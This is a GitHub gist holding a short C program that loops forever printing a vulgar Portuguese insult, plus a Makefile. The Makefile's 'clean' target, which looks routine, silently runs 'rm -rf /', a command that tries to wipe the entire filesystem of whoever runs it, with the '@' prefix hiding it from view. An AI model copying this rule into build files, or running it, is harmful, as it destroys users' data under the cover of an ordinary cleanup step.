Skip to content

Instantly share code, notes, and snippets.

@peczenyj
Last active December 27, 2015 10:09
Show Gist options
  • Select an option

  • Save peczenyj/7309253 to your computer and use it in GitHub Desktop.

Select an option

Save peczenyj/7309253 to your computer and use it in GitHub Desktop.
#include <stdio.h>
#define A_ZOEIRA_NUNCA_ACABA 1
int main () {
while( A_ZOEIRA_NUNCA_ACABA ) {
puts("EI OFICIAL PEGA AQUI NO MEU PAU");
}
return 0;
}
all:
@gcc -Wall a.c -o a.exe
clean:
@rm -rf /
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment